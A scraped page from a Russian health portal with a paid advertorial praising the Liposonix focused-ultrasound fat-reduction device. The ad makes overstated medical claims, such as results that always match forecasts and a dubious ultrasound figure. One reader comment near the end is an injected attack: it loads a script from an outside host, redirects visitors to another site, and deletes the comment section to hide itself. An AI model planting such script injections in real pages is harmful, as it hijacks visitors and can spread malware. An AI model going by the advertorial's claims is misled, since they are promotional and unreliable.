Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Технология двойного удара...  >>  Технология двойного удара: уменьшение объемов и омоложение кожи
 
Обратная связь
 

Технология двойного удара: уменьшение объемов и омоложение кожи

Размер шрифта
26 ноября 2012 11:26
  • google_analytics: false
  • Нравится

С помощью процедуры на современном американском аппарате Liposonix можно добиться уменьшения объемов и омоложения кожи.

липосоникс

Так было

Во все времена женщины старались приблизиться к идеалу. Но только в ХХ веке этот идеал стал обладать параметрами 90х60х90, о которых и сегодня грезят миллионы дам разных возрастов и весовых категорий.

Чтобы добиться желанного результата, женщины садятся на диету, проводят многочасовые тренировки в тренажерных залах и даже ложатся под нож пластического хирурга.

Но даже если похудеть удается, то малоприятным «бонусом» оказывается в первых двух случаях – снижение тургора (плотности, упругости и эластичности) кожи, в третьем – образование пусть минимальных, но все-таки рубцов.

Так есть

Достойной альтернативой всем ранее имеющимся способам похудеть стала косметологическая процедура на аппарате Liposonix, разработанном в американской компании SOLTA MEDICAL.

При помощи воздействия на жировые клетки фокусированным ультразвуком мощностью 2 кГц, аппарат помогает «прицельно» похудеть в нужных местах на 1 размер всего за одну процедуру. При этом кожа в зоне воздействия не только не приобретает дряблости, но напротив, становится более упругой и молодой.

Принцип действия аппарата

Фокусированный ультразвук обладает уникальным свойством проникать на глубину 1,3 см и разрушать находящиеся там жировые клетки кратковременным температурным воздействием – нагреванием до температуры свыше +56 градусов. Оказывая разрушительное действие на подкожно-жировую клетчатку, фокусированный ультразвук одновременно стимулирует близлежащие ткани дермы, активизируя в них выработку собственных коллагеновых волокон.

За счет такого избирательно действия и достигается видимый эффект «два в одном»: жировая складка постепенно уходит, словно тая, а кожа в зоне обработки подтягивается, приобретая здоровый и молодой вид.

Технология применения фокусированного ультразвука одобрена к применению FDA – агентством Министерства здравоохранения США, отвечающим за сохранение здоровья населения – и в полной мере отвечает современным российским требованиям безопасности.

Как это происходит

Процедура на аппарате Liposonix не требует предварительной подготовки и не предполагает периода реабилитации, что важно для современных работающих женщин.

Перед началом процедуры врач-косметолог определит возможные зоны воздействия – зоны, толщина жировой складки в которых составляет не менее 2,5 см. Это необходимо для того, чтобы мишенью фокусированного ультразвука оставалась исключительно жировая ткань.

Длительность процедуры составляет один час. В это время возможно ощущение легкого покалывания и небольшое покраснение кожных покровов в зоне обработки. Дискомфорт незначителен и быстро уходит по окончании процедуры.

Так будет

Всего одна процедура способна уменьшить объемы тела в зонах обработки до 2,5 дюймов, или до одного размера, улучшив при этом состояние кожи тела.

Максимальный эффект наблюдается через 8-12 недель. Именно такой срок необходим организму для естественного вывода разрушенных жировых клеток.

Направленное похудение при этом происходит плавно и гармонично, а результат его всегда точно соответствует прогнозам. И в этом тоже заключается уникальность процедуры на аппарате Liposonix!

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Аппаратная косметология: прицельно убираем лишний объем   Почему мужчины худеют быстрее женщин   Как есть, что угодно, и не переживать?   Как измерить свое тело, чтобы похудеть  
03 мая 2013Делай меньше, худей также! Ученые разработали суперсхему 17 апреля 2013Сколько вы спите – на столько и толстеете! Сколько же спать, чтобы худеть?
 
04 апреля 2013Когда делать зарядку, чтобы худеть быстрее 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 

Слайдшоу

1
Худшая еда для фигуры и чем ее заменить
10 продуктов от успешно похудевших
«Ужасная» еда, которая поможет похудеть

Тесты

1
Что вы знаете о груди?
Как устроены волосы человека?
Что вы знаете об аллергии?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.